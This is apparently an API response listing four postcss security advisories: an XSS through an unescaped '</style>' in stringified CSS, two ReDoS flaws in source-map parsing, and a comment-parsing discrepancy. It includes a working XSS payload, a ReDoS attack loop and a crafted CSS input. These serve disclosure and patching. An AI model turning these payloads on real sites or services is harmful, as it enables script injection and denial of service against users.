{"ecosystem":"npm","package":"postcss","version":null,"bugs":[{"id":4116,"ecosystem":"npm","package_name":"postcss","affected_version":null,"fixed_version":"8.5.10","bug_id":"osv:GHSA-qx2v-qp2m-jg93","title":"PostCSS has XSS via Unescaped </style> in its CSS Stringify Output","description":"# PostCSS: XSS via Unescaped `</style>` in CSS Stringify Output\n\n## Summary\n\nPostCSS v8.5.5 (latest at the time of the report) does not escape `</style>` sequences when stringifying CSS ASTs. When user-submitted CSS is parsed and re-stringified for embedding in HTML `<style>` tags, `</style>` in CSS values breaks out of the style context, enabling XSS.\n\n## Proof of Concept\n\n```javascript\nconst postcss = require('postcss');\n\n// Parse user CSS and re-stringify for page embedding\nconst userCSS = 'body { content: \"</style><script>alert(1)</script><style>\"; }';\nconst ast = postcss.parse(userCSS);\nconst output = ast.toResult().css;\nconst html = `<style>${output}</style>`;\n\nconsole.log(html);\n// <style>body { content: \"</style><script>alert(1)</script><style>\"; }</style>\n//\n// Browser: </style> closes the style tag, <script> executes\n```\n\n**Tested output** (Node.js v22, postcss v8.5.5):\n```\nInput: body { content: \"</style><script>alert(1)</script><style>\"; }\nOutput: body { content: \"</style><script>alert(1)</script><style>\"; }\nContains </style>: true\n```\n\n## Impact\n\nImpacts non-bundler use cases, since bundlers do not produce an XSS on their own. Requires some PostCSS plugin to contain malicious code, which can then inject the XSS into the website.\n\n## Suggested Fix\n\nEscape `</style` in all stringified output values:\n```javascript\noutput = output.replace(/<\\/(style)/gi, '<\\\\/$1');\n```\n\n## Credits\nDiscovered and reported by [Sunil Kumar](https://tharvid.in) ([@TharVid](https://github.com/TharVid))","severity":"medium","status":"fixed","source":"osv","source_url":"https://github.com/postcss/postcss/security/advisories/GHSA-qx2v-qp2m-jg93","labels":["CVE-2026-41305"],"created_at":"2026-04-26 03:00:13.717470+00:00","updated_at":"2026-04-26 03:00:13.717470+00:00"},{"id":4115,"ecosystem":"npm","package_name":"postcss","affected_version":"7.0.0","fixed_version":"7.0.36","bug_id":"osv:GHSA-hwj9-h5mp-3pm3","title":"Regular Expression Denial of Service in postcss","description":"The npm package `postcss` from 7.0.0 and before versions 7.0.36 and 8.2.10 is vulnerable to Regular Expression Denial of Service (ReDoS) during source map parsing.","severity":"medium","status":"fixed","source":"osv","source_url":"https://nvd.nist.gov/vuln/detail/CVE-2021-23368","labels":["CVE-2021-23368"],"created_at":"2026-04-26 03:00:13.710982+00:00","updated_at":"2026-04-26 03:00:13.710982+00:00"},{"id":4114,"ecosystem":"npm","package_name":"postcss","affected_version":null,"fixed_version":"8.4.31","bug_id":"osv:GHSA-7fh5-64p2-3v2j","title":"PostCSS line return parsing error","description":"An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be `\\r` discrepancies, as demonstrated by `@font-face{ font:(\\r/*);}` in a rule.\n\nThis vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contain parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.","severity":"medium","status":"fixed","source":"osv","source_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-44270","labels":["CVE-2023-44270"],"created_at":"2026-04-26 03:00:13.686393+00:00","updated_at":"2026-04-26 03:00:13.686393+00:00"},{"id":4113,"ecosystem":"npm","package_name":"postcss","affected_version":"8.0.0","fixed_version":"8.2.13","bug_id":"osv:GHSA-566m-qj78-rww5","title":"Regular Expression Denial of Service in postcss","description":"The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern\n```regex\n\\/\\*\\s* sourceMappingURL=(.*)\n```\n\n### PoC\n```js\nvar postcss = require(\"postcss\");\n\n// Build CSS with n unterminated source map annotations and no closing */\nfunction build_attack(n) {\n    var ret = \"a{}\";\n    for (var i = 0; i < n; i++) {\n        ret += \"/*# sourceMappingURL=\";\n    }\n    return ret + \"!\";\n}\n\n// Sanity check: a well-formed annotation parses normally\npostcss.parse('a{}/*# sourceMappingURL=a.css.map */');\n\n// Time the parse as the number of annotations grows; the cost grows super-linearly\nfor (var i = 1; i <= 500000; i++) {\n    if (i % 1000 == 0) {\n        var time = Date.now();\n        var attack_str = build_attack(i);\n        try {\n            postcss.parse(attack_str);\n        } catch (e) {\n            // a parse error is expected for the malformed input; only the time spent matters\n        }\n        var time_cost = Date.now() - time;\n        console.log(\"attack_str.length: \" + attack_str.length + \": \" + time_cost + \" ms\");\n    }\n}\n```","severity":"medium","status":"fixed","source":"osv","source_url":"https://nvd.nist.gov/vuln/detail/CVE-2021-23382","labels":["CVE-2021-23382"],"created_at":"2026-04-26 03:00:13.655007+00:00","updated_at":"2026-04-26 03:00:13.655007+00:00"}],"total":4,"_cache":"hit"}